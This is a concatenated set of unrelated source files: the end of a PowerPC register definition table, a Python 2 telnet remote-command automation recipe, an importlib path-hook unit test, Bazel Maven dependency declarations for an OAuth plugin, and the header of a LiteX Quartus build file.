Register('dcr17a', 4, 0x75e8),
Register('dcr17b', 4, 0x75ec),
Register('dcr17c', 4, 0x75f0),
Register('dcr17d', 4, 0x75f4),
Register('dcr17e', 4, 0x75f8),
Register('dcr17f', 4, 0x75fc),
Register('dcr180', 4, 0x7600),
Register('dcr181', 4, 0x7604),
Register('dcr182', 4, 0x7608),
Register('dcr183', 4, 0x760c),
Register('dcr184', 4, 0x7610),
Register('dcr185', 4, 0x7614),
Register('dcr186', 4, 0x7618),
Register('dcr187', 4, 0x761c),
Register('dcr188', 4, 0x7620),
Register('dcr189', 4, 0x7624),
Register('dcr18a', 4, 0x7628),
Register('dcr18b', 4, 0x762c),
Register('dcr18c', 4, 0x7630),
Register('dcr18d', 4, 0x7634),
Register('dcr18e', 4, 0x7638),
Register('dcr18f', 4, 0x763c),
Register('dcr190', 4, 0x7640),
Register('dcr191', 4, 0x7644),
Register('dcr192', 4, 0x7648),
Register('dcr193', 4, 0x764c),
Register('dcr194', 4, 0x7650),
Register('dcr195', 4, 0x7654),
Register('dcr196', 4, 0x7658),
Register('dcr197', 4, 0x765c),
Register('dcr198', 4, 0x7660),
Register('dcr199', 4, 0x7664),
Register('dcr19a', 4, 0x7668),
Register('dcr19b', 4, 0x766c),
Register('dcr19c', 4, 0x7670),
Register('dcr19d', 4, 0x7674),
Register('dcr19e', 4, 0x7678),
Register('dcr19f', 4, 0x767c),
Register('dcr1a0', 4, 0x7680),
Register('dcr1a1', 4, 0x7684),
Register('dcr1a2', 4, 0x7688),
Register('dcr1a3', 4, 0x768c),
Register('dcr1a4', 4, 0x7690),
Register('dcr1a5', 4, 0x7694),
Register('dcr1a6', 4, 0x7698),
Register('dcr1a7', 4, 0x769c),
Register('dcr1a8', 4, 0x76a0),
Register('dcr1a9', 4, 0x76a4),
Register('dcr1aa', 4, 0x76a8),
Register('dcr1ab', 4, 0x76ac),
Register('dcr1ac', 4, 0x76b0),
Register('dcr1ad', 4, 0x76b4),
Register('dcr1ae', 4, 0x76b8),
Register('dcr1af', 4, 0x76bc),
Register('dcr1b0', 4, 0x76c0),
Register('dcr1b1', 4, 0x76c4),
Register('dcr1b2', 4, 0x76c8),
Register('dcr1b3', 4, 0x76cc),
Register('dcr1b4', 4, 0x76d0),
Register('dcr1b5', 4, 0x76d4),
Register('dcr1b6', 4, 0x76d8),
Register('dcr1b7', 4, 0x76dc),
Register('dcr1b8', 4, 0x76e0),
Register('dcr1b9', 4, 0x76e4),
Register('dcr1ba', 4, 0x76e8),
Register('dcr1bb', 4, 0x76ec),
Register('dcr1bc', 4, 0x76f0),
Register('dcr1bd', 4, 0x76f4),
Register('dcr1be', 4, 0x76f8),
Register('dcr1bf', 4, 0x76fc),
Register('dcr1c0', 4, 0x7700),
Register('dcr1c1', 4, 0x7704),
Register('dcr1c2', 4, 0x7708),
Register('dcr1c3', 4, 0x770c),
Register('dcr1c4', 4, 0x7710),
Register('dcr1c5', 4, 0x7714),
Register('dcr1c6', 4, 0x7718),
Register('dcr1c7', 4, 0x771c),
Register('dcr1c8', 4, 0x7720),
Register('dcr1c9', 4, 0x7724),
Register('dcr1ca', 4, 0x7728),
Register('dcr1cb', 4, 0x772c),
Register('dcr1cc', 4, 0x7730),
Register('dcr1cd', 4, 0x7734),
Register('dcr1ce', 4, 0x7738),
Register('dcr1cf', 4, 0x773c),
Register('dcr1d0', 4, 0x7740),
Register('dcr1d1', 4, 0x7744),
Register('dcr1d2', 4, 0x7748),
Register('dcr1d3', 4, 0x774c),
Register('dcr1d4', 4, 0x7750),
Register('dcr1d5', 4, 0x7754),
Register('dcr1d6', 4, 0x7758),
Register('dcr1d7', 4, 0x775c),
Register('dcr1d8', 4, 0x7760),
Register('dcr1d9', 4, 0x7764),
Register('dcr1da', 4, 0x7768),
Register('dcr1db', 4, 0x776c),
Register('dcr1dc', 4, 0x7770),
Register('dcr1dd', 4, 0x7774),
Register('dcr1de', 4, 0x7778),
Register('dcr1df', 4, 0x777c),
Register('dcr1e0', 4, 0x7780),
Register('dcr1e1', 4, 0x7784),
Register('dcr1e2', 4, 0x7788),
Register('dcr1e3', 4, 0x778c),
Register('dcr1e4', 4, 0x7790),
Register('dcr1e5', 4, 0x7794),
Register('dcr1e6', 4, 0x7798),
Register('dcr1e7', 4, 0x779c),
Register('dcr1e8', 4, 0x77a0),
Register('dcr1e9', 4, 0x77a4),
Register('dcr1ea', 4, 0x77a8),
Register('dcr1eb', 4, 0x77ac),
Register('dcr1ec', 4, 0x77b0),
Register('dcr1ed', 4, 0x77b4),
Register('dcr1ee', 4, 0x77b8),
Register('dcr1ef', 4, 0x77bc),
Register('dcr1f0', 4, 0x77c0),
Register('dcr1f1', 4, 0x77c4),
Register('dcr1f2', 4, 0x77c8),
Register('dcr1f3', 4, 0x77cc),
Register('dcr1f4', 4, 0x77d0),
Register('dcr1f5', 4, 0x77d4),
Register('dcr1f6', 4, 0x77d8),
Register('dcr1f7', 4, 0x77dc),
Register('dcr1f8', 4, 0x77e0),
Register('dcr1f9', 4, 0x77e4),
Register('dcr1fa', 4, 0x77e8),
Register('dcr1fb', 4, 0x77ec),
Register('dcr1fc', 4, 0x77f0),
Register('dcr1fd', 4, 0x77f4),
Register('dcr1fe', 4, 0x77f8),
Register('dcr1ff', 4, 0x77fc),
Register('dcr200', 4, 0x7800),
Register('dcr201', 4, 0x7804),
Register('dcr202', 4, 0x7808),
Register('dcr203', 4, 0x780c),
Register('dcr204', 4, 0x7810),
Register('dcr205', 4, 0x7814),
Register('dcr206', 4, 0x7818),
Register('dcr207', 4, 0x781c),
Register('dcr208', 4, 0x7820),
Register('dcr209', 4, 0x7824),
Register('dcr20a', 4, 0x7828),
Register('dcr20b', 4, 0x782c),
Register('dcr20c', 4, 0x7830),
Register('dcr20d', 4, 0x7834),
Register('dcr20e', 4, 0x7838),
Register('dcr20f', 4, 0x783c),
Register('dcr210', 4, 0x7840),
Register('dcr211', 4, 0x7844),
Register('dcr212', 4, 0x7848),
Register('dcr213', 4, 0x784c),
Register('dcr214', 4, 0x7850),
Register('dcr215', 4, 0x7854),
Register('dcr216', 4, 0x7858),
Register('dcr217', 4, 0x785c),
Register('dcr218', 4, 0x7860),
Register('dcr219', 4, 0x7864),
Register('dcr21a', 4, 0x7868),
Register('dcr21b', 4, 0x786c),
Register('dcr21c', 4, 0x7870),
Register('dcr21d', 4, 0x7874),
Register('dcr21e', 4, 0x7878),
Register('dcr21f', 4, 0x787c),
Register('dcr220', 4, 0x7880),
Register('dcr221', 4, 0x7884),
Register('dcr222', 4, 0x7888),
Register('dcr223', 4, 0x788c),
Register('dcr224', 4, 0x7890),
Register('dcr225', 4, 0x7894),
Register('dcr226', 4, 0x7898),
Register('dcr227', 4, 0x789c),
Register('dcr228', 4, 0x78a0),
Register('dcr229', 4, 0x78a4),
Register('dcr22a', 4, 0x78a8),
Register('dcr22b', 4, 0x78ac),
Register('dcr22c', 4, 0x78b0),
Register('dcr22d', 4, 0x78b4),
Register('dcr22e', 4, 0x78b8),
Register('dcr22f', 4, 0x78bc),
Register('dcr230', 4, 0x78c0),
Register('dcr231', 4, 0x78c4),
Register('dcr232', 4, 0x78c8),
Register('dcr233', 4, 0x78cc),
Register('dcr234', 4, 0x78d0),
Register('dcr235', 4, 0x78d4),
Register('dcr236', 4, 0x78d8),
Register('dcr237', 4, 0x78dc),
Register('dcr238', 4, 0x78e0),
Register('dcr239', 4, 0x78e4),
Register('dcr23a', 4, 0x78e8),
Register('dcr23b', 4, 0x78ec),
Register('dcr23c', 4, 0x78f0),
Register('dcr23d', 4, 0x78f4),
Register('dcr23e', 4, 0x78f8),
Register('dcr23f', 4, 0x78fc),
Register('dcr240', 4, 0x7900),
Register('dcr241', 4, 0x7904),
Register('dcr242', 4, 0x7908),
Register('dcr243', 4, 0x790c),
Register('dcr244', 4, 0x7910),
Register('dcr245', 4, 0x7914),
Register('dcr246', 4, 0x7918),
Register('dcr247', 4, 0x791c),
Register('dcr248', 4, 0x7920),
Register('dcr249', 4, 0x7924),
Register('dcr24a', 4, 0x7928),
Register('dcr24b', 4, 0x792c),
Register('dcr24c', 4, 0x7930),
Register('dcr24d', 4, 0x7934),
Register('dcr24e', 4, 0x7938),
Register('dcr24f', 4, 0x793c),
Register('dcr250', 4, 0x7940),
Register('dcr251', 4, 0x7944),
Register('dcr252', 4, 0x7948),
Register('dcr253', 4, 0x794c),
Register('dcr254', 4, 0x7950),
Register('dcr255', 4, 0x7954),
Register('dcr256', 4, 0x7958),
Register('dcr257', 4, 0x795c),
Register('dcr258', 4, 0x7960),
Register('dcr259', 4, 0x7964),
Register('dcr25a', 4, 0x7968),
Register('dcr25b', 4, 0x796c),
Register('dcr25c', 4, 0x7970),
Register('dcr25d', 4, 0x7974),
Register('dcr25e', 4, 0x7978),
Register('dcr25f', 4, 0x797c),
Register('dcr260', 4, 0x7980),
Register('dcr261', 4, 0x7984),
Register('dcr262', 4, 0x7988),
Register('dcr263', 4, 0x798c),
Register('dcr264', 4, 0x7990),
Register('dcr265', 4, 0x7994),
Register('dcr266', 4, 0x7998),
Register('dcr267', 4, 0x799c),
Register('dcr268', 4, 0x79a0),
Register('dcr269', 4, 0x79a4),
Register('dcr26a', 4, 0x79a8),
Register('dcr26b', 4, 0x79ac),
Register('dcr26c', 4, 0x79b0),
Register('dcr26d', 4, 0x79b4),
Register('dcr26e', 4, 0x79b8),
Register('dcr26f', 4, 0x79bc),
Register('dcr270', 4, 0x79c0),
Register('dcr271', 4, 0x79c4),
Register('dcr272', 4, 0x79c8),
Register('dcr273', 4, 0x79cc),
Register('dcr274', 4, 0x79d0),
Register('dcr275', 4, 0x79d4),
Register('dcr276', 4, 0x79d8),
Register('dcr277', 4, 0x79dc),
Register('dcr278', 4, 0x79e0),
Register('dcr279', 4, 0x79e4),
Register('dcr27a', 4, 0x79e8),
Register('dcr27b', 4, 0x79ec),
Register('dcr27c', 4, 0x79f0),
Register('dcr27d', 4, 0x79f4),
Register('dcr27e', 4, 0x79f8),
Register('dcr27f', 4, 0x79fc),
Register('dcr280', 4, 0x7a00),
Register('dcr281', 4, 0x7a04),
Register('dcr282', 4, 0x7a08),
Register('dcr283', 4, 0x7a0c),
Register('dcr284', 4, 0x7a10),
Register('dcr285', 4, 0x7a14),
Register('dcr286', 4, 0x7a18),
Register('dcr287', 4, 0x7a1c),
Register('dcr288', 4, 0x7a20),
Register('dcr289', 4, 0x7a24),
Register('dcr28a', 4, 0x7a28),
Register('dcr28b', 4, 0x7a2c),
Register('dcr28c', 4, 0x7a30),
Register('dcr28d', 4, 0x7a34),
Register('dcr28e', 4, 0x7a38),
Register('dcr28f', 4, 0x7a3c),
Register('dcr290', 4, 0x7a40),
Register('dcr291', 4, 0x7a44),
Register('dcr292', 4, 0x7a48),
Register('dcr293', 4, 0x7a4c),
Register('dcr294', 4, 0x7a50),
Register('dcr295', 4, 0x7a54),
Register('dcr296', 4, 0x7a58),
Register('dcr297', 4, 0x7a5c),
Register('dcr298', 4, 0x7a60),
Register('dcr299', 4, 0x7a64),
Register('dcr29a', 4, 0x7a68),
Register('dcr29b', 4, 0x7a6c),
Register('dcr29c', 4, 0x7a70),
Register('dcr29d', 4, 0x7a74),
Register('dcr29e', 4, 0x7a78),
Register('dcr29f', 4, 0x7a7c),
Register('dcr2a0', 4, 0x7a80),
Register('dcr2a1', 4, 0x7a84),
Register('dcr2a2', 4, 0x7a88),
Register('dcr2a3', 4, 0x7a8c),
Register('dcr2a4', 4, 0x7a90),
Register('dcr2a5', 4, 0x7a94),
Register('dcr2a6', 4, 0x7a98),
Register('dcr2a7', 4, 0x7a9c),
Register('dcr2a8', 4, 0x7aa0),
Register('dcr2a9', 4, 0x7aa4),
Register('dcr2aa', 4, 0x7aa8),
Register('dcr2ab', 4, 0x7aac),
Register('dcr2ac', 4, 0x7ab0),
Register('dcr2ad', 4, 0x7ab4),
Register('dcr2ae', 4, 0x7ab8),
Register('dcr2af', 4, 0x7abc),
Register('dcr2b0', 4, 0x7ac0),
Register('dcr2b1', 4, 0x7ac4),
Register('dcr2b2', 4, 0x7ac8),
Register('dcr2b3', 4, 0x7acc),
Register('dcr2b4', 4, 0x7ad0),
Register('dcr2b5', 4, 0x7ad4),
Register('dcr2b6', 4, 0x7ad8),
Register('dcr2b7', 4, 0x7adc),
Register('dcr2b8', 4, 0x7ae0),
Register('dcr2b9', 4, 0x7ae4),
Register('dcr2ba', 4, 0x7ae8),
Register('dcr2bb', 4, 0x7aec),
Register('dcr2bc', 4, 0x7af0),
Register('dcr2bd', 4, 0x7af4),
Register('dcr2be', 4, 0x7af8),
Register('dcr2bf', 4, 0x7afc),
Register('dcr2c0', 4, 0x7b00),
Register('dcr2c1', 4, 0x7b04),
Register('dcr2c2', 4, 0x7b08),
Register('dcr2c3', 4, 0x7b0c),
Register('dcr2c4', 4, 0x7b10),
Register('dcr2c5', 4, 0x7b14),
Register('dcr2c6', 4, 0x7b18),
Register('dcr2c7', 4, 0x7b1c),
Register('dcr2c8', 4, 0x7b20),
Register('dcr2c9', 4, 0x7b24),
Register('dcr2ca', 4, 0x7b28),
Register('dcr2cb', 4, 0x7b2c),
Register('dcr2cc', 4, 0x7b30),
Register('dcr2cd', 4, 0x7b34),
Register('dcr2ce', 4, 0x7b38),
Register('dcr2cf', 4, 0x7b3c),
Register('dcr2d0', 4, 0x7b40),
Register('dcr2d1', 4, 0x7b44),
Register('dcr2d2', 4, 0x7b48),
Register('dcr2d3', 4, 0x7b4c),
Register('dcr2d4', 4, 0x7b50),
Register('dcr2d5', 4, 0x7b54),
Register('dcr2d6', 4, 0x7b58),
Register('dcr2d7', 4, 0x7b5c),
Register('dcr2d8', 4, 0x7b60),
Register('dcr2d9', 4, 0x7b64),
Register('dcr2da', 4, 0x7b68),
Register('dcr2db', 4, 0x7b6c),
Register('dcr2dc', 4, 0x7b70),
Register('dcr2dd', 4, 0x7b74),
Register('dcr2de', 4, 0x7b78),
Register('dcr2df', 4, 0x7b7c),
Register('dcr2e0', 4, 0x7b80),
Register('dcr2e1', 4, 0x7b84),
Register('dcr2e2', 4, 0x7b88),
Register('dcr2e3', 4, 0x7b8c),
Register('dcr2e4', 4, 0x7b90),
Register('dcr2e5', 4, 0x7b94),
Register('dcr2e6', 4, 0x7b98),
Register('dcr2e7', 4, 0x7b9c),
Register('dcr2e8', 4, 0x7ba0),
Register('dcr2e9', 4, 0x7ba4),
Register('dcr2ea', 4, 0x7ba8),
Register('dcr2eb', 4, 0x7bac),
Register('dcr2ec', 4, 0x7bb0),
Register('dcr2ed', 4, 0x7bb4),
Register('dcr2ee', 4, 0x7bb8),
Register('dcr2ef', 4, 0x7bbc),
Register('dcr2f0', 4, 0x7bc0),
Register('dcr2f1', 4, 0x7bc4),
Register('dcr2f2', 4, 0x7bc8),
Register('dcr2f3', 4, 0x7bcc),
Register('dcr2f4', 4, 0x7bd0),
Register('dcr2f5', 4, 0x7bd4),
Register('dcr2f6', 4, 0x7bd8),
Register('dcr2f7', 4, 0x7bdc),
Register('dcr2f8', 4, 0x7be0),
Register('dcr2f9', 4, 0x7be4),
Register('dcr2fa', 4, 0x7be8),
Register('dcr2fb', 4, 0x7bec),
Register('dcr2fc', 4, 0x7bf0),
Register('dcr2fd', 4, 0x7bf4),
Register('dcr2fe', 4, 0x7bf8),
Register('dcr2ff', 4, 0x7bfc),
Register('dcr300', 4, 0x7c00),
Register('dcr301', 4, 0x7c04),
Register('dcr302', 4, 0x7c08),
Register('dcr303', 4, 0x7c0c),
Register('dcr304', 4, 0x7c10),
Register('dcr305', 4, 0x7c14),
Register('dcr306', 4, 0x7c18),
Register('dcr307', 4, 0x7c1c),
Register('dcr308', 4, 0x7c20),
Register('dcr309', 4, 0x7c24),
Register('dcr30a', 4, 0x7c28),
Register('dcr30b', 4, 0x7c2c),
Register('dcr30c', 4, 0x7c30),
Register('dcr30d', 4, 0x7c34),
Register('dcr30e', 4, 0x7c38),
Register('dcr30f', 4, 0x7c3c),
Register('dcr310', 4, 0x7c40),
Register('dcr311', 4, 0x7c44),
Register('dcr312', 4, 0x7c48),
Register('dcr313', 4, 0x7c4c),
Register('dcr314', 4, 0x7c50),
Register('dcr315', 4, 0x7c54),
Register('dcr316', 4, 0x7c58),
Register('dcr317', 4, 0x7c5c),
Register('dcr318', 4, 0x7c60),
Register('dcr319', 4, 0x7c64),
Register('dcr31a', 4, 0x7c68),
Register('dcr31b', 4, 0x7c6c),
Register('dcr31c', 4, 0x7c70),
Register('dcr31d', 4, 0x7c74),
Register('dcr31e', 4, 0x7c78),
Register('dcr31f', 4, 0x7c7c),
Register('dcr320', 4, 0x7c80),
Register('dcr321', 4, 0x7c84),
Register('dcr322', 4, 0x7c88),
Register('dcr323', 4, 0x7c8c),
Register('dcr324', 4, 0x7c90),
Register('dcr325', 4, 0x7c94),
Register('dcr326', 4, 0x7c98),
Register('dcr327', 4, 0x7c9c),
Register('dcr328', 4, 0x7ca0),
Register('dcr329', 4, 0x7ca4),
Register('dcr32a', 4, 0x7ca8),
Register('dcr32b', 4, 0x7cac),
Register('dcr32c', 4, 0x7cb0),
Register('dcr32d', 4, 0x7cb4),
Register('dcr32e', 4, 0x7cb8),
Register('dcr32f', 4, 0x7cbc),
Register('dcr330', 4, 0x7cc0),
Register('dcr331', 4, 0x7cc4),
Register('dcr332', 4, 0x7cc8),
Register('dcr333', 4, 0x7ccc),
Register('dcr334', 4, 0x7cd0),
Register('dcr335', 4, 0x7cd4),
Register('dcr336', 4, 0x7cd8),
Register('dcr337', 4, 0x7cdc),
Register('dcr338', 4, 0x7ce0),
Register('dcr339', 4, 0x7ce4),
Register('dcr33a', 4, 0x7ce8),
Register('dcr33b', 4, 0x7cec),
Register('dcr33c', 4, 0x7cf0),
Register('dcr33d', 4, 0x7cf4),
Register('dcr33e', 4, 0x7cf8),
Register('dcr33f', 4, 0x7cfc),
Register('dcr340', 4, 0x7d00),
Register('dcr341', 4, 0x7d04),
Register('dcr342', 4, 0x7d08),
Register('dcr343', 4, 0x7d0c),
Register('dcr344', 4, 0x7d10),
Register('dcr345', 4, 0x7d14),
Register('dcr346', 4, 0x7d18),
Register('dcr347', 4, 0x7d1c),
Register('dcr348', 4, 0x7d20),
Register('dcr349', 4, 0x7d24),
Register('dcr34a', 4, 0x7d28),
Register('dcr34b', 4, 0x7d2c),
Register('dcr34c', 4, 0x7d30),
Register('dcr34d', 4, 0x7d34),
Register('dcr34e', 4, 0x7d38),
Register('dcr34f', 4, 0x7d3c),
Register('dcr350', 4, 0x7d40),
Register('dcr351', 4, 0x7d44),
Register('dcr352', 4, 0x7d48),
Register('dcr353', 4, 0x7d4c),
Register('dcr354', 4, 0x7d50),
Register('dcr355', 4, 0x7d54),
Register('dcr356', 4, 0x7d58),
Register('dcr357', 4, 0x7d5c),
Register('dcr358', 4, 0x7d60),
Register('dcr359', 4, 0x7d64),
Register('dcr35a', 4, 0x7d68),
Register('dcr35b', 4, 0x7d6c),
Register('dcr35c', 4, 0x7d70),
Register('dcr35d', 4, 0x7d74),
Register('dcr35e', 4, 0x7d78),
Register('dcr35f', 4, 0x7d7c),
Register('dcr360', 4, 0x7d80),
Register('dcr361', 4, 0x7d84),
Register('dcr362', 4, 0x7d88),
Register('dcr363', 4, 0x7d8c),
Register('dcr364', 4, 0x7d90),
Register('dcr365', 4, 0x7d94),
Register('dcr366', 4, 0x7d98),
Register('dcr367', 4, 0x7d9c),
Register('dcr368', 4, 0x7da0),
Register('dcr369', 4, 0x7da4),
Register('dcr36a', 4, 0x7da8),
Register('dcr36b', 4, 0x7dac),
Register('dcr36c', 4, 0x7db0),
Register('dcr36d', 4, 0x7db4),
Register('dcr36e', 4, 0x7db8),
Register('dcr36f', 4, 0x7dbc),
Register('dcr370', 4, 0x7dc0),
Register('dcr371', 4, 0x7dc4),
Register('dcr372', 4, 0x7dc8),
Register('dcr373', 4, 0x7dcc),
Register('dcr374', 4, 0x7dd0),
Register('dcr375', 4, 0x7dd4),
Register('dcr376', 4, 0x7dd8),
Register('dcr377', 4, 0x7ddc),
Register('dcr378', 4, 0x7de0),
Register('dcr379', 4, 0x7de4),
Register('dcr37a', 4, 0x7de8),
Register('dcr37b', 4, 0x7dec),
Register('dcr37c', 4, 0x7df0),
Register('dcr37d', 4, 0x7df4),
Register('dcr37e', 4, 0x7df8),
Register('dcr37f', 4, 0x7dfc),
Register('dcr380', 4, 0x7e00),
Register('dcr381', 4, 0x7e04),
Register('dcr382', 4, 0x7e08),
Register('dcr383', 4, 0x7e0c),
Register('dcr384', 4, 0x7e10),
Register('dcr385', 4, 0x7e14),
Register('dcr386', 4, 0x7e18),
Register('dcr387', 4, 0x7e1c),
Register('dcr388', 4, 0x7e20),
Register('dcr389', 4, 0x7e24),
Register('dcr38a', 4, 0x7e28),
Register('dcr38b', 4, 0x7e2c),
Register('dcr38c', 4, 0x7e30),
Register('dcr38d', 4, 0x7e34),
Register('dcr38e', 4, 0x7e38),
Register('dcr38f', 4, 0x7e3c),
Register('dcr390', 4, 0x7e40),
Register('dcr391', 4, 0x7e44),
Register('dcr392', 4, 0x7e48),
Register('dcr393', 4, 0x7e4c),
Register('dcr394', 4, 0x7e50),
Register('dcr395', 4, 0x7e54),
Register('dcr396', 4, 0x7e58),
Register('dcr397', 4, 0x7e5c),
Register('dcr398', 4, 0x7e60),
Register('dcr399', 4, 0x7e64),
Register('dcr39a', 4, 0x7e68),
Register('dcr39b', 4, 0x7e6c),
Register('dcr39c', 4, 0x7e70),
Register('dcr39d', 4, 0x7e74),
Register('dcr39e', 4, 0x7e78),
Register('dcr39f', 4, 0x7e7c),
Register('dcr3a0', 4, 0x7e80),
Register('dcr3a1', 4, 0x7e84),
Register('dcr3a2', 4, 0x7e88),
Register('dcr3a3', 4, 0x7e8c),
Register('dcr3a4', 4, 0x7e90),
Register('dcr3a5', 4, 0x7e94),
Register('dcr3a6', 4, 0x7e98),
Register('dcr3a7', 4, 0x7e9c),
Register('dcr3a8', 4, 0x7ea0),
Register('dcr3a9', 4, 0x7ea4),
Register('dcr3aa', 4, 0x7ea8),
Register('dcr3ab', 4, 0x7eac),
Register('dcr3ac', 4, 0x7eb0),
Register('dcr3ad', 4, 0x7eb4),
Register('dcr3ae', 4, 0x7eb8),
Register('dcr3af', 4, 0x7ebc),
Register('dcr3b0', 4, 0x7ec0),
Register('dcr3b1', 4, 0x7ec4),
Register('dcr3b2', 4, 0x7ec8),
Register('dcr3b3', 4, 0x7ecc),
Register('dcr3b4', 4, 0x7ed0),
Register('dcr3b5', 4, 0x7ed4),
Register('dcr3b6', 4, 0x7ed8),
Register('dcr3b7', 4, 0x7edc),
Register('dcr3b8', 4, 0x7ee0),
Register('dcr3b9', 4, 0x7ee4),
Register('dcr3ba', 4, 0x7ee8),
Register('dcr3bb', 4, 0x7eec),
Register('dcr3bc', 4, 0x7ef0),
Register('dcr3bd', 4, 0x7ef4),
Register('dcr3be', 4, 0x7ef8),
Register('dcr3bf', 4, 0x7efc),
Register('dcr3c0', 4, 0x7f00),
Register('dcr3c1', 4, 0x7f04),
Register('dcr3c2', 4, 0x7f08),
Register('dcr3c3', 4, 0x7f0c),
Register('dcr3c4', 4, 0x7f10),
Register('dcr3c5', 4, 0x7f14),
Register('dcr3c6', 4, 0x7f18),
Register('dcr3c7', 4, 0x7f1c),
Register('dcr3c8', 4, 0x7f20),
Register('dcr3c9', 4, 0x7f24),
Register('dcr3ca', 4, 0x7f28),
Register('dcr3cb', 4, 0x7f2c),
Register('dcr3cc', 4, 0x7f30),
Register('dcr3cd', 4, 0x7f34),
Register('dcr3ce', 4, 0x7f38),
Register('dcr3cf', 4, 0x7f3c),
Register('dcr3d0', 4, 0x7f40),
Register('dcr3d1', 4, 0x7f44),
Register('dcr3d2', 4, 0x7f48),
Register('dcr3d3', 4, 0x7f4c),
Register('dcr3d4', 4, 0x7f50),
Register('dcr3d5', 4, 0x7f54),
Register('dcr3d6', 4, 0x7f58),
Register('dcr3d7', 4, 0x7f5c),
Register('dcr3d8', 4, 0x7f60),
Register('dcr3d9', 4, 0x7f64),
Register('dcr3da', 4, 0x7f68),
Register('dcr3db', 4, 0x7f6c),
Register('dcr3dc', 4, 0x7f70),
Register('dcr3dd', 4, 0x7f74),
Register('dcr3de', 4, 0x7f78),
Register('dcr3df', 4, 0x7f7c),
Register('dcr3e0', 4, 0x7f80),
Register('dcr3e1', 4, 0x7f84),
Register('dcr3e2', 4, 0x7f88),
Register('dcr3e3', 4, 0x7f8c),
Register('dcr3e4', 4, 0x7f90),
Register('dcr3e5', 4, 0x7f94),
Register('dcr3e6', 4, 0x7f98),
Register('dcr3e7', 4, 0x7f9c),
Register('dcr3e8', 4, 0x7fa0),
Register('dcr3e9', 4, 0x7fa4),
Register('dcr3ea', 4, 0x7fa8),
Register('dcr3eb', 4, 0x7fac),
Register('dcr3ec', 4, 0x7fb0),
Register('dcr3ed', 4, 0x7fb4),
Register('dcr3ee', 4, 0x7fb8),
Register('dcr3ef', 4, 0x7fbc),
Register('dcr3f0', 4, 0x7fc0),
Register('dcr3f1', 4, 0x7fc4),
Register('dcr3f2', 4, 0x7fc8),
Register('dcr3f3', 4, 0x7fcc),
Register('dcr3f4', 4, 0x7fd0),
Register('dcr3f5', 4, 0x7fd4),
Register('dcr3f6', 4, 0x7fd8),
Register('dcr3f7', 4, 0x7fdc),
Register('dcr3f8', 4, 0x7fe0),
Register('dcr3f9', 4, 0x7fe4),
Register('dcr3fa', 4, 0x7fe8),
Register('dcr3fb', 4, 0x7fec),
Register('dcr3fc', 4, 0x7ff0),
Register('dcr3fd', 4, 0x7ff4),
Register('dcr3fe', 4, 0x7ff8),
Register('dcr3ff', 4, 0x7ffc),
Register('acc', 8, 0x10000)
]
register_arch(['powerpc:le:32:quicc'], 32, Endness.LE, ArchPcode_PowerPC_LE_32_QUICC)
|
recipes/Python/52228_Remote_control_with_telnetlib/recipe-52228.py | tdiprima/code | 2,023 | 9633 | <reponame>tdiprima/code<filename>recipes/Python/52228_Remote_control_with_telnetlib/recipe-52228.py
# auto_telnet.py - remote control via telnet
import os, sys, string, telnetlib
from getpass import getpass
class AutoTelnet:
def __init__(self, user_list, cmd_list, **kw):
self.host = kw.get('host', 'localhost')
self.timeout = kw.get('timeout', 600)
self.command_prompt = kw.get('command_prompt', "$ ")
self.passwd = {}
for user in user_list:
self.passwd[user] = getpass("Enter user '%s' password: " % user)
self.telnet = telnetlib.Telnet()
for user in user_list:
self.telnet.open(self.host)
ok = self.action(user, cmd_list)
if not ok:
print "Unable to process:", user
self.telnet.close()
def action(self, user, cmd_list):
t = self.telnet
t.write("\n")
login_prompt = "login: "
response = t.read_until(login_prompt, 5)
if string.count(response, login_prompt):
print response
else:
return 0
password_prompt = "Password:"
t.write("%s\n" % user)
response = t.read_until(password_prompt, 3)
if string.count(response, password_prompt):
print response
else:
return 0
t.write("%s\n" % self.passwd[user])
response = t.read_until(self.command_prompt, 5)
if not string.count(response, self.command_prompt):
return 0
for cmd in cmd_list:
t.write("%s\n" % cmd)
response = t.read_until(self.command_prompt, self.timeout)
if not string.count(response, self.command_prompt):
return 0
print response
return 1
if __name__ == '__main__':
basename = os.path.splitext(os.path.basename(sys.argv[0]))[0]
logname = os.environ.get("LOGNAME", os.environ.get("USERNAME"))
host = 'localhost'
import getopt
optlist, user_list = getopt.getopt(sys.argv[1:], 'c:f:h:')
usage = """
usage: %s [-h host] [-f cmdfile] [-c "command"] user1 user2 ...
-c command
-f command file
-h host (default: '%s')
Example: %s -c "echo $HOME" %s
""" % (basename, host, basename, logname)
if len(sys.argv) < 2:
print usage
sys.exit(1)
cmd_list = []
for (opt, optarg) in optlist:
if opt == '-f':
for r in open(optarg).readlines():
if string.rstrip(r):
cmd_list.append(r)
elif opt == '-c':
command = optarg
if command[0] == '"' and command[-1] == '"':
command = command[1:-1]
cmd_list.append(command)
elif opt == '-h':
host = optarg
autoTelnet = AutoTelnet(user_list, cmd_list, host=host)
|
Codes/Python32/Lib/importlib/test/extension/test_path_hook.py | eyantra/FireBird_Swiss_Knife | 319 | 9637 | from importlib import _bootstrap
from . import util
import collections
import imp
import sys
import unittest
class PathHookTests(unittest.TestCase):
"""Test the path hook for extension modules."""
# XXX Should it only succeed for pre-existing directories?
# XXX Should it only work for directories containing an extension module?
def hook(self, entry):
return _bootstrap._file_path_hook(entry)
def test_success(self):
# Path hook should handle a directory where a known extension module
# exists.
self.assertTrue(hasattr(self.hook(util.PATH), 'find_module'))
def test_main():
from test.support import run_unittest
run_unittest(PathHookTests)
if __name__ == '__main__':
test_main()
|
external_plugin_deps.bzl | michalgagat/plugins_oauth | 143 | 9646 | <reponame>michalgagat/plugins_oauth
load("//tools/bzl:maven_jar.bzl", "maven_jar")
def external_plugin_deps(omit_commons_codec = True):
JACKSON_VERS = "2.10.2"
maven_jar(
name = "scribejava-core",
artifact = "com.github.scribejava:scribejava-core:6.9.0",
sha1 = "ed761f450d8382f75787e8fee9ae52e7ec768747",
)
maven_jar(
name = "jackson-annotations",
artifact = "com.fasterxml.jackson.core:jackson-annotations:" + JACKSON_VERS,
sha1 = "3a13b6105946541b8d4181a0506355b5fae63260",
)
maven_jar(
name = "jackson-databind",
artifact = "com.fasterxml.jackson.core:jackson-databind:" + JACKSON_VERS,
sha1 = "0528de95f198afafbcfb0c09d2e43b6e0ea663ec",
deps = [
"@jackson-annotations//jar",
],
)
if not omit_commons_codec:
maven_jar(
name = "commons-codec",
artifact = "commons-codec:commons-codec:1.4",
sha1 = "4216af16d38465bbab0f3dff8efa14204f7a399a",
)
|
litex/build/altera/quartus.py | osterwood/litex | 1,501 | 9678 | #
# This file is part of LiteX.
#
